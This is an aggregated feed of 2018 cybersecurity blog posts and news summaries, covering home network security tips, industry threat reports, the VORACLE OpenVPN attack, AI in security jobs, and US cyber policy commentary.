  1. Have Wi-Fi in your house?
  2. Have at least one device connected to the Internet?
  3. Ever have friends or family over?

Now, the big one:

  1. Are you sure everything is secure?

Go ahead and answer — no one is watching (or are they? We’ll come back to that a bit further down). By the end of this post, you will have a more sound answer for No. 4 than you probably do now.

1. Secure your computer

Perhaps the simplest place to start with home security is to secure your actual devices. Computers, tablets, and phones are all susceptible to malicious infections from the Internet or from apps that are more than meets the eye — or that are free, but with a catch.

To protect your devices, the best advice is to install a good antivirus solution. There’s no shortage of capable products reviewed by trusted, independent professionals. They range greatly in price, and you can even get some free. I recommend our Kaspersky Security Cloud product because it offers the most advanced protection and covers multiple devices including PC, Mac, Android, and even iOS devices.

On top of a good antivirus program, it is also a good rule of thumb to download apps only from official sources — Google Play, Apple’s App Store, or the app’s site. Doing otherwise, you risk ending up with a somewhat modified version of the app you were looking for, with extra features like filling your screen with ads, spying on you, mining cryptocurrencies at your expense, or even stealing your bank account login.

2. Secure your Wi-Fi

When you had Internet connectivity added to your home, your provider probably installed its own combination modem/router, named your home network, and set up a password for you. If you didn’t change that name and set a new password afterwards, now’s the time. The main reason is that you are paying for the service, why let someone take it from you?

Most routers have a default username and password like admin/admin or admin/password. A simple Google search for your router model will yield those default credentials. From there, they can rename the network, set a new password, and reconfigure any other available options. Or, you can. Do that now. While you’re in there, be sure to update the router’s firmware.

You should also set up a guest network for friends and family who visit your home. I named mine “FBI Van” just to mess with people — I won’t mention the name of the main Wi-Fi here — and, obviously, gave it a different password.

3. Secure smart devices / Internet of Things

Now, if you are connecting IoT devices to your network, I would suggest hooking them up to your guest network rather than the main one, and also changing their default passwords. You may be wondering why you should change the password.

The answer lies in the same issue as the router defaults mentioned earlier. Most IoT devices have a default password that is just a Google search away. Go ahead and check it out for yourself, and then work on changing yours.

A reason this issue causes concern is that many criminals have infected these devices and are adding them to botnets at an alarming rate.

4. Blindfold Big Brother

Earlier, we asked if anyone was watching you. In some ways, it was a small joke, but it really is sensible to be cautious when it comes to your computer’s webcam. Many apps and websites ask for access to your camera and microphone. What are they doing with it? Well, you never know for sure, but there is a chance that someone, somewhere in the world is actually watching you.

How can you avoid this? You can throw a piece of tape over the camera or buy a webcam protector that you open only when you want to use your camera. Good antivirus programs also offer the ability to restrict access to cameras — a feature I highly recommend.

5. Keep out USB threats

One other threat needs to be mentioned, something that affects not only businesses, but also everyday people like you or me.

Have you ever found a USB stick in a parking lot, park, office lobby, or somewhere else? If I shook my Magic 8-Ball, I think it would say signs point to yes. With the amount of trade-show swag and giveaways we all encounter, these devices are basically a dime a dozen, so dropping one won’t cause too much angst.

Now, if you find one, should you plug it into your computer and see what surprises lie within? The answer is just two letters long: No! You see, not only will curiosity probably kill the cat, but it can also bring malware or a hidden cryptocurrency miner onto your device. Don’t believe me? Look no farther back than 2010, when the Stuxnet virus infected the network of an Iranian nuclear facility through a good old USB stick.

Fast-forward to 2018 and recent research from Kaspersky Lab shows that USB sticks and other removable media are still very popular among cybercriminals as a means of infection.

I hope these tips help you and bring you a few steps closer to a secure home network. I would also suggest reading up on the tips we offer on Kaspersky Daily to further boost your levels of security.



Kaspersky Lab official blog

Every month should be Cyber Security Awareness Month

In 2004, October was deemed National Cyber Security Awareness Month (NCSAM). This was an initiative promoted by the National Cyber Security Division (NCSD) within the Department of Homeland Security and the National Cyber Security Alliance (NCSA, a non-profit organization). It’s been 14 years since its inception, has it worked? Are we more aware of the perils in the world of cyber security? The reality is that there are various studies that have been conducted over … More

The post Every month should be Cyber Security Awareness Month appeared first on Help Net Security.

Securing campus networks became more challenging

The results of a global Infoblox survey on the state of network security at higher education institutions reveals that 81 percent of IT professionals believe securing campus networks has become more challenging in the last two years. The report titled “Defending Networks at Higher Learning Institutions – Heroes Needed” surveyed over 600 students, IT professionals and staff from higher education institutions in the U.S., U.K. and Germany, and found that networks at higher education institutions … More

The post Securing campus networks became more challenging appeared first on Help Net Security.

Identity spoofing is the most prevalent attack vector for the gaming and gambling industry

A new ThreatMetrix Cybercrime Report revealed that identity spoofing, fuelled by stolen identity data, is the most prevalent attack vector for the gaming and gambling industry. It also pinpointed a marked growth in location (IP) spoofing attacks. In the second quarter, location spoofing became the fastest growing attack vector in the space, increasing 257% year-on-year. This is due to the availability of more sophisticated location spoofing tools, which fraudsters use to attempt to disguise their … More

The post Identity spoofing is the most prevalent attack vector for the gaming and gambling industry appeared first on Help Net Security.

6 ways to keep up with cybersecurity without going crazy

As we dive headfirst into National Cybersecurity Awareness Month, it seems only fitting to discuss ways to stay on top of developments in modern cybersecurity and privacy. What’s the best way to stay protected? How can you determine if something is a scam? Which big company has been breached now?

The topic of security features heavily across many industries, blogs, and news channels simply because of the current state of affairs. It seems like every day we hear about a new major data breach, affecting thousands—if not millions—of people. From retailers like Target to social media sites such as Facebook to more prominent credit agencies like Equifax—no one is safe.

The uncontrolled nature of attacks coupled with the 24/7 news cycle make it downright overwhelming to keep up with all the cybersecurity information lobbed at us. The widespread release of new attacks, data breaches, systems failures, and malware use have led many to a feeling of security fatigue. We’re essentially all at a point where we’re sick and tired of hearing about it, and frankly disappointed in many companies and individuals who continually fail to protect the data they are responsible for.

Fatigue or not, we shouldn’t collectively ignore what’s happening in the world of cybersecurity right now. We all have a duty to not only protect ourselves, but also our communities, countries, and world over by staying in the know. You can contribute by keeping your knowledge up-to-date and employing a few simple strategies to capture the good information out there and weed out the bad.

1. Follow security professionals and influencers

We live in the information age, where knowledge is digital, recorded and streamed for posterity, stored in giant servers, and available at the entry of a search term. You can acquire new information and expand your knowledge in a variety of ways, according to your preferred methods.

For example, you can glean information from more traditional sources such as news websites and blogs from security experts, but you can also turn to social media, attend webinars and conferences, or communicate directly with someone well-versed in the field.

You could even bring it up at the office water cooler or by making small talk with parents at your child’s school—cybersecurity is covered so much in the media now that it’s become fodder for mainstream chatter. Many will happily discuss more than the just latest breach, possibly drawing up a debate on which security solution is the best or offering up ways in which you can protect yourself from attack.

Whatever you choose, you’ll want to follow some of the top security professionals for the best guidance. Some of my favorites include:

2. Browse security-related social media topics

Most social media networks are great resources for digging up additional content, such as news stories (real ones), videos, opinions, and other posts. In addition, they’re home to a treasure trove of supplemental information on local, national, and global events, career opportunities, top cybersecurity businesses, and more. Of course, social media is not the only place you’ll want to acquire information from, but it can serve as a complement to some of the other channels on this list.

Twitter is especially useful if you know which trends and hashtags to search, as well as who to follow. It allows you to see discussions about current events in real time so you can be right there, in the moment, when things play out.

Twitter lists are also great for creating a niche content feed. You can specify which security vendors, influencers, and developers you’d like to be in your list (or lists), and filter Tweets accordingly. Lists have the added benefit of weeding out noise not pertinent to a particular group—you can focus on a single topic or community.

3. Attend live events

Believe it or not, there’s a huge market for live, in-person cybersecurity events. This includes so much more than conferences, or “cons.” You might also attend lectures, discussions, workshops, networking events, educational courses, or sponsored meet ups.

Web-based events present another great avenue, such as webinars and online community conference calls. Some of the best live cybersecurity speakers will attend such events or be asked to participate, and it stands to reason you can learn a lot from any one of them.

So how do you find such events? You have to keep a pulse on when, where, and what’s happening around you. Local newspapers are great resources for event listings. And of course, there’s always trusty-old Google. Luckily, some of the other channels mentioned in this article will also help keep you informed.

4. Check vulnerability and risk advisory feeds

One cannot overstate the need to remain aware of security vulnerabilities discovered in both new and old technologies—especially for business owners. Web browsers, apps, software, operating systems, and a variety of the personal or professional tools you use may have been compromised or attacked.

You should make a habit of checking vulnerability alert feeds and advisory sites to ensure the protection of your personal and corporate data. Here’s a quick list:

If regularly checking these feeds feels overwhelming, another approach would be to simply keep your programs updated at all times so there’s no chance a cybercriminal can exploit the vulnerability and gain access to your machine.

5. Listen to a podcast

We all lead busy lives—maybe you don’t have time to read article after article. But what about the time you spend driving, walking, or traveling? Podcasts fill this time nicely, as you can listen to them on-the-go and multi-task while doing so.

Podcasts can be found—and listened to—through a variety of channels, including media apps, music libraries such as iTunes or Spotify, Amazon, or even YouTube.

6. Customize your own real-time alerts

Using a tool such as IFTTT—which stands for If This Then That—you can set up customized alerts for all things cybersecurity.

The subreddit r/netsec, for example, is one of the most popular curated forums for cybersecurity news and information. You can configure IFTTT so it sends you push notifications or emails when something gains popularity on the subreddit. The headlines will populate in the taskbar of your mobile device allowing you to gauge whether or not the story is worth your time.

The r/netsec example is just one of many, of course. You can configure any trusted sites or community forums to send you alerts via RSS feed as you see fit.

Just keep consuming

If you want to stay as close to the bleeding edge of cybersecurity as you can, continue to consume content, whether that’s by reading, listening, talking, watching videos, or attending live events. Understand that as you learn, the industry will continue to evolve, so staying on top of cybersecurity developments means adapting to an ever-shifting landscape. It’s unfortunately not enough anymore to glance at one article and call it a day.

While you understandably won’t have the time or inclination to invest every waking hour in your cybersecurity pursuits, you can certainly remain in-the-know without losing your mind by carefully curating and streamlining online information, and turning to sources you trust. There are plenty of ways to make yourself crazy. Learning more about cybersecurity shouldn’t be one of them.

The post 6 ways to keep up with cybersecurity without going crazy appeared first on Malwarebytes Labs.

Radware Blog: Disaster Recovery: Data Center or Host Infrastructure Reroute

Companies, even large ones, haven’t considered disaster recovery plans outside of their primary cloud providers own infrastructure as regularly as they should. In March of this year, Amazon Web Services (AWS) had a massive failure which directly impacted some of the world’s largest brands, taking them offline for several hours. In this case, it was […]

The post Disaster Recovery: Data Center or Host Infrastructure Reroute appeared first on Radware Blog.



Radware Blog

The Many Paths To A Cybersecurity Education

Ask a room full of cybersecurity professionals about their educational background and how they got started on their career path and you’re going to get a myriad of different answers.

From one perspective, that’s frustrating. It’s hard to confidently recommend a path for people starting out when almost any path can end up at your desired destination: a long, sustainable career in cybersecurity.

The good news? Cybersecurity is a career path where your hard work and efforts will have a dramatic effect on your success. The lack of a degree, certification, or other credential won’t necessarily hold you back…but they definitely can help you.

Mindset

Before we dive into specific education options, let’s look at the type of thinking and personality that leads to a successful cybersecurity professional, regardless of the cybersecurity role.

If you are:

● Excited about learning constantly
● Eager to seek out different points of view
● Persistent and doggedly determined

Then a career in cybersecurity will probably be a great fit. I can’t stress how important this mindset is. The technology aspects will come and go at a rapid pace. These areas can be learned and will need to be re-learned time and time again.

These personality traits will help ensure that you’re not only successful but have a fulfilling career in the field. Cybersecurity presents a unique challenge in that it covers all aspects of technology. There’s a near endless opportunity to learn and apply that learning to drive real-world outcomes.

But if you’re not excited about the constant learning required to deal with an ever-changing landscape, not eager to evaluate multiple viewpoints, and give up when the going gets tough, cybersecurity is not a good fit.

If you’re still reading, then let’s move on to the more direct aspects of getting ready for a career in cybersecurity: education.

Undergraduate Degree

Over the past few years, a number of cybersecurity-focused undergraduate programs have been rolled out around the world. The challenge here is availability.

Cybersecurity-focused programs are not yet widely available. That limits this option for most people. However, an undergraduate degree in computer science, computer engineering, math, finance, or business will all serve you well. Basically any degree that helps you better understand how technology works, how technology is used, or how business runs is going to help…significantly.

Certifications

While their value if often debated, certifications can provide a huge boost to the start of your cybersecurity career. The number one pushback against certifications is that they usually are not hands-on.

Hands-on experience is absolutely critical, but third party validation of your knowledge is probably more important early in your career. Certifications from reputable organizations can help give you a leg up and make that first step on your career path a little bit easier.

Your first certification(s) should focus on broad cybersecurity topics. Avoid technology-specific certifications at first. This will keep your options open instead of tying yourself to a specific technology.

Experience

The most valuable – and most difficult – type of education is hands-on experience. You typically have to get in the door somewhere…anywhere… before you can start to get hands-on experience.

There are other ways to demonstrate that you can apply what you’ve learned. Here are a few ideas to help get you started;

● Review some code or an architecture for an open source project. Write up the results and share them
● Analyze a cybersecurity headline and provide a risk assessment on the related technologies/services
● Attend a local meetup where they are hosting an activity or a local (or online) CTF

All of these options are free, give you a chance to apply some of your knowledge, and are perfect for sharing with others in the community.

No Wrong Path

The only wrong step on the path toward a career in cybersecurity is not taking that first step.

Cybersecurity is an exciting career choice that contains a multitude of roles covering almost everything you can imagine. If you enjoy tackling complex problems from a number of different angles, it’s hard to ask for a more compelling career choice. The fact that it’s one of the hottest areas in tech is just icing on the cake!

What is your inspiration for a pursuing a career in cybersecurity? What steps have to you taken towards that goal? Let me know in the comments below or on Twitter where I’m @marknca.

The post The Many Paths To A Cybersecurity Education appeared first on .

Cybersecurity Future Trends: Why More Bots Means More Jobs

As the technological world hurls into the 2020s and cybersecurity future trends become reality, many experts expect the industry to evolve rapidly. Among the paradigm shifts still to come from digital innovation, data protection is bound to change and expand beyond the capabilities of today’s most common tools.

Above all, expect artificial intelligence (AI) to take a bigger role in cybersecurity as the IT industry seeks more efficient ways to shut down attacks immediately — or even before they happen.

Hiring AI Cybersecurity Guards

In the near future, new AI-powered solutions will look for anomalies in enterprise systems while matching patterns in threat actor behavior to predict when attacks are coming, said Shashi Kiran, chief marketing officer at Quali, a vendor of cloud automation services. Companies will also use AI tools to analyze user behavior and dig through system logs to spot problems, noted Laura Lee, executive vice president of rapid prototyping at cybersecurity training vendor Circadence. Lee said she expects AI-powered cybersecurity training to become more common as well.

In addition, AI systems will soon be able to analyze data from multiple sources, provide virtual assistants with special knowledge in cybersecurity and assist with penetration testing. In the coming decades, the “full scope of AI will be brought to bear in cybersecurity training environments to provide intelligent advisers, feedback and an AI adversary to practice against,” Lee added.

Planning for Obsolescence

Newer AI systems should provide capabilities that traditional antivirus products can’t. Many current security products focus largely on signature-based detection or analytics from patterns of suspicious activity, said Jason Rebholz, senior director of strategic partnerships at cybersecurity vendor Gigamon.

“With the emergence of AI, the basic decision-making can be offloaded to software,” he added. “While this isn’t a replacement for the analyst, it provides more time for them to perform more advanced decision-making and analysis, which is not easily replaced with AI.”

An AI-Driven Coding Evolution

Some security experts see big things for AI, with a sort of evolution built into its abilities.

“Imagine a world where cyberdefenses adapt and evolve with no human intervention,” said Kathie Miley, chief operating officer (COO) at Cybrary, another cybersecurity training company. “By putting AI into practice with evolutionary algorithms, software will also be able to assess current state, improve upon itself or kill off components no longer ideal for survival.”

Miley offered the example of a developer who accidentally creates a program with a structured query language (SQL) injection vulnerability: “AI will catch it and correct it with no human involvement, because it knows [the vulnerability is] dangerous to the application’s survival.”

Unfortunately, AI-trained systems won’t be exclusive to defenders. As Miley noted, threat actors “will be able to use AI to evolve their attacks without lifting a finger. It’s a race to who is stronger — the good guys or the bad guys.”

Why Cybersecurity Future Trends Won’t Exclude Humans

But even as AI takes a more central role in many organizations’ cybersecurity efforts, the need for qualified cybersecurity professionals will not diminish.

“Until AI evolves and wipes out humans, there will always be a place for people in the cybersecurity field,” Miley said. “Regulations, compliance, ethics and needs will need to be determined by us carbon life forms. However, tasks such as monitoring attacks and coding errors — and even coding itself — will certainly be automated at some point in the near future.”

Miley added that she sees a strong demand for security architects and governance, risk and compliance professionals in the coming years.

How AI Will Help Bridge the Skills Gap

New ways of automating some cybersecurity functions will help the industry bridge the cybersecurity skills gap that’s been growing since 2014. A recent Cybersecurity Ventures report forecast a shortage of 3.5 million open cybersecurity positions by 2021.

Bret Fund, founder and CEO of cybersecurity training academy SecureSet, argued that automated tools will require more refined skill sets.

“We will still have an education problem that will be exacerbated by the new skills required to interpret and analyze AI,” he predicted.

In addition, many small and medium-sized businesses will adopt AI tools more slowly than large enterprises will, meaning plenty of cybersecurity jobs will be available, Fund added.

Cybersecurity Workers: Seize the Day

Lee noted that demand is growing for cybersecurity workers with data science expertise as organizations look to maximize the value of the data they collect. She said she also foresees a shift in cybersecurity jobs that will “place soft skills and strategy at equal importance as required technical skills.”

Cybersecurity analysts, penetration testers and incident response professionals will be popular with job recruiters for several years, she added. However, those jobs may be changing, with more workers “expected to carry competencies in strategic thinking, creativity, problem-solving, working in teams and reporting alongside business objectives.”

Augmenting Automating With a Human Touch

According to Cesar Cerrudo, chief technology officer (CTO) of cybersecurity and penetration testing vendor IOActive Labs, paint-by-the-numbers cybersecurity jobs will soon be a thing of the past.

“Jobs that consist of repetitive tasks and tasks that don’t require creativity will disappear,” he said. “Having broad knowledge on past, latest and upcoming threats, along with broad vision in cybersecurity, will be required to achieve better results. You can’t properly secure a technology without anticipating what it will look tomorrow or in the next year.”

As technologies and their security measures carry us into 2020, forecasting threat trends will be the name of the game. Machine learning won’t replace the cybersecurity workforce any time soon, but get ready for a new face (or lack thereof) on your security operations center (SOC). Developing a broader skill set now and keeping an open mind will help you best prepare for the security industry of the future.

The post Cybersecurity Future Trends: Why More Bots Means More Jobs appeared first on Security Intelligence.

Your backup data sets can become a treasure trove for advanced threat detection

Despite ever increasing investments in security technologies, data breaches and cyber incidents are increasing at a relentless rate, and the problem is projected to keep getting worse. Industry research shows that attacks from ransomware, data compromise, malicious email and credential theft more than doubled to 160,000 incidents per year, with unreported incidents likely bringing the true number to more than 350,000. While much of the press focused on breaches to high profile targets, every size … More

The post Your backup data sets can become a treasure trove for advanced threat detection appeared first on Help Net Security.

Most Fortune 50 companies unprepared for major DNS attack

ThousandEyes has found that 68 percent of the top 50 companies on the Global Fortune 500 rankings are not adequately prepared for the next major attack on the DNS. Additionally, researchers found similar vulnerability among 44 percent of the top 25 SaaS providers, as well as 72% of the FTSE 100 companies. “Because Digital Experience is so central to a brand’s success these days, it’s critical that businesses understand that not all DNS infrastructures are … More

The post Most Fortune 50 companies unprepared for major DNS attack appeared first on Help Net Security.

Hunton Insurance Head Comments on Hotel Data Breach Coverage Dispute

As reported on the Insurance Recovery Blog, Hunton Andrews Kurth insurance practice head Walter Andrews recently commented to the Global Data Review regarding the infirmities underlying an Orlando, Florida federal district court’s ruling that an insurer does not have to defend its insured for damage caused by a third-party data breach.

The decision in St. Paul Fire & Marine Ins. Co. v. Rosen Millennium Inc., which involved a claim for coverage under two general liability insurance policies, turned on whether or not customers’ credit card information obtained from the insured’s payment system had been “made known” and by whom. According to the district court, the insurance policies required that the credit card information be “made known” by the insured, however in this instance, the publication was made by the third-party hackers. As Andrews explained, however, although it was undisputed that Florida law controlled interpretation of Millennium’s policies, the district court based its decision on a prior decision decided under South Carolina law, which differs from Florida law in many fundamental respects. “Florida state law makes it very clear that coverage is meant to be construed in favor of the policyholder where there is ambiguity,” Andrews said. “To me, it’s clear that there were two reasonable interpretations of the insurance policy here.”

Despite the outcome, Andrews noted that there are helpful takeaways from this decision for policyholders and prospective insureds facing potential exposure from cyber events: “Given how strenuously the insurers are fighting to deny coverage for data breach claims, a readable takeaway is that policyholders should consider getting very specific cyber insurance coverage.”

View the district court’s decision, and Andrews’ comments to the Global Data Review.

Radware Blog: Protecting Sensitive Data: A Black Swan Never Truly Sits Still

The black swan – a rare and unpredictable event notorious for its ability to completely change the tides of a situation. For cybersecurity, these nightmares can take the form of disabled critical services such as municipal electrical grids and other connected infrastructure networks, data breaches, application failures, and DDoS attacks. They can range from the […]

The post Protecting Sensitive Data: A Black Swan Never Truly Sits Still appeared first on Radware Blog.



Radware Blog

Security Vulnerabilities in US Weapons Systems

The US Government Accounting Office just published a new report: "Weapons Systems Cyber Security: DOD Just Beginning to Grapple with Scale of Vulnerabilities" (summary here). The upshot won't be a surprise to any of my regular readers: they're vulnerable.

From the summary:

Automation and connectivity are fundamental enablers of DOD's modern military capabilities. However, they make weapon systems more vulnerable to cyber attacks. Although GAO and others have warned of cyber risks for decades, until recently, DOD did not prioritize weapon systems cybersecurity. Finally, DOD is still determining how best to address weapon systems cybersecurity.

In operational testing, DOD routinely found mission-critical cyber vulnerabilities in systems that were under development, yet program officials GAO met with believed their systems were secure and discounted some test results as unrealistic. Using relatively simple tools and techniques, testers were able to take control of systems and largely operate undetected, due in part to basic issues such as poor password management and unencrypted communications. In addition, vulnerabilities that DOD is aware of likely represent a fraction of total vulnerabilities due to testing limitations. For example, not all programs have been tested and tests do not reflect the full range of threats.

It is definitely easier, and cheaper, to ignore the problem or pretend it isn't a big deal. But that's probably a mistake in the long run.

IIS attacks surge from 2,000 to 1.7 million over last quarter

IIS, Drupal, and Oracle WebLogic web technologies experienced increased attacks in Q2 2018. According to a new threat report from eSentire, IIS attacks showed a massive increase, from 2,000 to 1.7 million, since last quarter. Exploit campaigns observed April 1 – July 1, 2018 Analysis of the attacks revealed that both IIS and WebLogic exploits maintained a consistent number of attacks (about 200) per IP across organizations, with those attacks originating from servers hosting Apache, … More

The post IIS attacks surge from 2,000 to 1.7 million over last quarter appeared first on Help Net Security.

Growing intrusion trends: A perspective on today’s most sophisticated cyberattacks

According to a new CrowdStrike report, the technology, professional services, and hospitality sectors were targeted most often by cyber adversaries. The actors used a variety of novel tactics, demonstrating particular creativity and perseverance in defense-evasion and credential-access TTPs such as the use of Windows Internal tool, Active Directory Explorer, for one-time credential dumping. Notable percentages of intrusion cases by vertical include: Technology: 36% Professional Services: 17% Hospitality: 8% Defense and Federal: 7% Non-governmental Organizations: 7% … More

The post Growing intrusion trends: A perspective on today’s most sophisticated cyberattacks appeared first on Help Net Security.

Cryptomining dethrones ransomware as top threat in 2018

Based on trends in the first half of 2018, Webroot found that cybercriminals are shifting to increasingly sophisticated and targeted means of attack while also expanding their money making endeavors, as shown by the uptick in cryptojacking and cryptomining. The current threat landscape There has been a massive shift from ransomware to cryptomining Malware in general, including ransomware and cryptomining, accounted for 52 percent of threats in the first half of 2018. Nonconsensual cryptomining (known … More

The post Cryptomining dethrones ransomware as top threat in 2018 appeared first on Help Net Security.

Privileged account practices are poor, and IT security teams know it

One Identity released new global research that uncovers a widespread inability to implement basic best practices across identity and access management (IAM) and privileged access management (PAM) security disciplines, likely exposing organizations to data breaches and other significant security risks. Among the survey’s most surprising findings are that nearly one-third of organizations are using manual methods or spreadsheets to manage privileged account credentials, and one in 20 IT security professionals admit they have no way … More

The post Privileged account practices are poor, and IT security teams know it appeared first on Help Net Security.

Most consumers don’t trust companies to keep personal information secure

High-profile security breaches and changing regulations have raised consumer concerns and pressured businesses, establishing 2018 as a landmark year in the data economy. Original research from Oxford Economics highlights several challenges faced by businesses as they adjust to changing regulations and consumer uncertainty, including a resounding lack of trust — just 8% of consumers strongly agree that they trust businesses to keep their personal information safe. The research also shows roughly 80% of businesses have … More

The post Most consumers don’t trust companies to keep personal information secure appeared first on Help Net Security.

The VORACLE OpenVPN Attack: What You Need to Know

Many of us know that using a VPN (Virtual Private Network) adds an extra layer of security to our Wi-Fi networks. But VORACLE, a recently discovered vulnerability that was announced at a security conference by security researcher Ahamad Nafeez, is making some people reconsider this this steadfast safety tip. Let’s look under the hood at this vulnerability to understand what was impacted and why, and what we should do in the future when it comes to safely connecting to Wi-Fi.

Under the Hood of a VPN

A VPN is a connection between a secure server and your mobile device or computer. Through the VPN your activity and information on the internet is encrypted, making it difficult for anyone else to see your private information. Many of us use a VPN for work when we travel, some of us use them to watch videos online, and more and more of us use them as a best practice to help keep our information safe any time we want to use a Wi-Fi connection that we’re not sure about.

About the VORACLE VPN Vulnerability

At a high level, VORACLE leverages a vulnerability found in the open-source OpenVPN protocol. OpenVPN is an open-source protocol used by the majority of VPN providers, meaning many VPN products are affected.

The VORACLE attack can recover HTTP traffic sent via encrypted VPN connections under certain conditions, the first being that the VPN app in use enables compression via the OpenVPN protocol. A  hacker must be on the same network and able to lure you to an HTTP (not HTTPS) site with malicious code through phishing or a similar other tactic. The attack can happen on all web browsers but Google Chrome, due to the way in which HTTP requests are made.

Luckily the McAfee Safe Connect VPN was not built on the vulnerable OpenVPN code. That said, I want to take this opportunity to remind you of something we talk about a lot in the security industry: relying on only one layer of security is simply not enough today. Here are some tips and best practices to stay safe.

  • Set up multi-factor authentication whenever possible. This tip is especially important for valuable accounts like email or social media, which might be connected to financial information. With multi-factor authentication in place, you’ll be better protected by combining your usual login information with another layer of protection, such as a one-time-password sent to your phone, bio metrics (say, a thumb print), or a security token that you’ll need to confirm before getting access to your account.
  • Use secure websites (HTTPS) whenever possible. The ‘S’ at the end of HTTPS stands for ‘Secure’. It means all communications between your browser and the website are encrypted. Most websites are moving toward this standard practice, so if you notice yourself landing on a website with just HTTP, stay alert.
  • Avoid making financial transactions until you’re on a network you trust. Sharing personal data like your credit card information can lead to unnecessary vulnerabilities. The best bet is to wait until you’re on your home network with additional layers of security such as McAfee’s Secure Home Platform already in place.
  • Consider using your mobile network and being your own hotspot. If your mobile or IoT data plan includes a hot spot, consider using that over Wi-Fi to avoid some of the challenges that come with it in the first place.
  • Do continue to use a personal VPN when you’re on the go and using Wi-Fi– just be sure to do so while having an additional layer of security in place so that if a similar vulnerability is discovered, you’ll already have a backup.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post The VORACLE OpenVPN Attack: What You Need to Know appeared first on McAfee Blogs.

Microsoft October Patch Tuesday Fixes 12 Critical Vulnerabilities

Microsoft has just released its latest monthly Patch Tuesday updates for October 2018, fixing a total of 49 security vulnerabilities in its products. This month's security updates address security vulnerabilities in Microsoft Windows, Edge Browser, Internet Explorer, MS Office, MS Office Services and Web Apps, ChakraCore, SQL Server Management Studio, and Exchange Server. Out of 49 flaws

Let’s Continue the Skills Gap Conversation

Most analysis is that the cybersecurity skills gap or shortage is getting worse. ESG reported in CSOOnline that 2018 had the highest levels, at 51%, where organizations “claimed their organization had a problematic shortage of cybersecurity skills.”

It’s a complex problem, but I believe with non-complex solutions.

 

The Problems (and the Solutions)

  • HR & How We Look at CyberSecJobs
  • Education
  • Tech Change
  • Increased Detection, and FPP (False Positives Phobia)

HR and How We Look at Jobs

This is a complex aspect of the complex problem. Cybersecurity is like healthcare, in that there isn’t one ‘job’ or role. Heart surgeons, lab technicians, and medical device designers are all part of that market however the submarkets they occupy are very distinct and there is overall very little cross-market progression. Other areas of technology may be somewhat similar however they don’t seem to have more job role and progression order than the unsorted pile of Lego that is cybersecurity. I’ve seen too many postings looking for 10 years experience for a security technology that is 5 years old, salary assignments that are 1/3rd the going market rate for the described role, or great candidates not considered because they were filtered out when the word ‘cybersecurity’ ‘C.I.S.S.P.’ and not CISSP wasn’t in the in the CV. It’s so inefficient, and the more so because it amplifies the skills gap by narrowing the pool of candidates.  So what’s the fix?  This one is the hardest one on the list so I put it first. There’s a systemic change needed here in how we describe roles, and try and fill them. I’m pragmatic I believe on this one – not until the companies and agencies who are looking for security people get frustrated enough will there be momentum to change.

Education and Certification

At the very front of the pipe, education is how we produce the cybersecurity people. Not only hasn’t the education stream produced the right number of people, because of the above mentioned issues on how we look at CyberSecJobs, post-secondary has been a big miss. Historically, post-secondary have tried ‘jack of all trades’ programmes that produced graduates without the specialization to be quickly employable, having spent time smeared across too many disciplines. Think of that heart surgeon spending a term learning electronics QA processes. Product-specific training filled the gap, and this is successful if a candidate will be dealing with that product but it’s a gamble that a prospective employer will use those products you are trained on. For non-hand-on or non-ops roles certifications have been widespread, but mostly have been too broad, like the CISSP, to be really a skills-gap filler, and the very specific certifications haven’t had the adoption to be recognized. It isn’t the fault of the certification bodies for the latter, but instead the issue again of too much tendency towards treating security as one big job bucket.  So what’s the fix? Greater links between industry and post-secondary education is a first step. Post secondary is starting to move to post-graduation success tracking for cybersecurity but only a few. Better practical linkage between foundation and application is needed without overlaps. For example, foundations of firewalls should be a general course and product specific courses should build on that. There also needs to be better conversion training. An advanced admin of product X should have a better certification and training path to achieving a similar level on product Y. Otherwise certifications today are an all-in-one of the CISSP or an alphabet soup that is effectively meaningless to filling jobs or assessing a provider. Government seems the help of last resort on non-product certifications but I think we’re there. For all the investment and noise about the importance of cybersecurity if the free market has failed with CISSP et al then they need to sponsor or assist (not direct) a re-invention of what gives those marks of achievement and progression (note those are plural and not a single certification) for our cybersecurity people. Heck, we do it for so many trades we rely on for trusted service from mechanics to electricians why not the security that protects our lives and economy?

Tech Change

Security on its own has no value: it’s a verb that is applied to a technology. As technology changes, so must security.  The challenge is that unlike one technology changing on a cycle, any technology change in your business can have a security impact that needs addressing. This is the primary reason that security appears so chaotic, it is because it necessarily reacts to multiple sources of disruption. This isn’t going away.   So what’s the fix? More resilient security architectures that presume change. We have this already in some aspects, such as multi-cloud support for many security products that support AWS, Azure, Google Cloud, VMWare, et al. Another is how we fund and provision security. Some leading organizations tie the security budget to the IT budget in some way, and that becomes more important as a way to tie security investment to complexity.

Increased Detection, and FPP

Security has just gone through a wave of adding increased detection capability. This has been great for finding attacks that are evasive to signatures or haven’t previously been seen. The downside is this has led to a glut of events to process in some organizations. Increased detection generally has meant an increase in alerts that have lower confidence than purely signature based methods. Of course there are high fidelity non-signature alerting but there’s clearly an increase in FPP (False Positives Phobia). All these extra alerts and extra indicators of compromise would be awesome if we had a matching increase in people but we don’t. So what’s the fix? This is the best opportunity on the list, that of taking all this new security information and getting refined value from it without throwing people at the issue. One big win is real machine learning (ML). True AI is the next step but today assistance by ML is a real security force multiplier.  Outsourcing through managed security service providers (MSSP) has always been an option but they too struggle with staffing, so a hybrid approach of ML+MSSP is very cool as a managed detection and response (MDR) option. Increasing feeds of alerts and information needs to be matched with ML assistance where the ML doesn’t just produce more alerts needing human intervention.

The post Let’s Continue the Skills Gap Conversation appeared first on .

The US National Cyber Strategy

Last month, the White House released the "National Cyber Strategy of the United States of America. I generally don't have much to say about these sorts of documents. They're filled with broad generalities. Who can argue with:

Defend the homeland by protecting networks, systems, functions, and data;

Promote American prosperity by nurturing a secure, thriving digital economy and fostering strong domestic innovation;

Preserve peace and security by strengthening the ability of the United States in concert with allies and partners ­ to deter and, if necessary, punish those who use cyber tools for malicious purposes; and

Expand American influence abroad to extend the key tenets of an open, interoperable, reliable, and secure Internet.

The devil is in the details, of course. And the strategy includes no details.

In a New York Times op-ed, Josephine Wolff argues that this new strategy, together with the more-detailed Department of Defense cyber strategy and the classified National Security Presidential Memorandum 13, represent a dangerous shift of US cybersecurity posture from defensive to offensive:

...the National Cyber Strategy represents an abrupt and reckless shift in how the United States government engages with adversaries online. Instead of continuing to focus on strengthening defensive technologies and minimizing the impact of security breaches, the Trump administration plans to ramp up offensive cyberoperations. The new goal: deter adversaries through pre-emptive cyberattacks and make other nations fear our retaliatory powers.

[...]

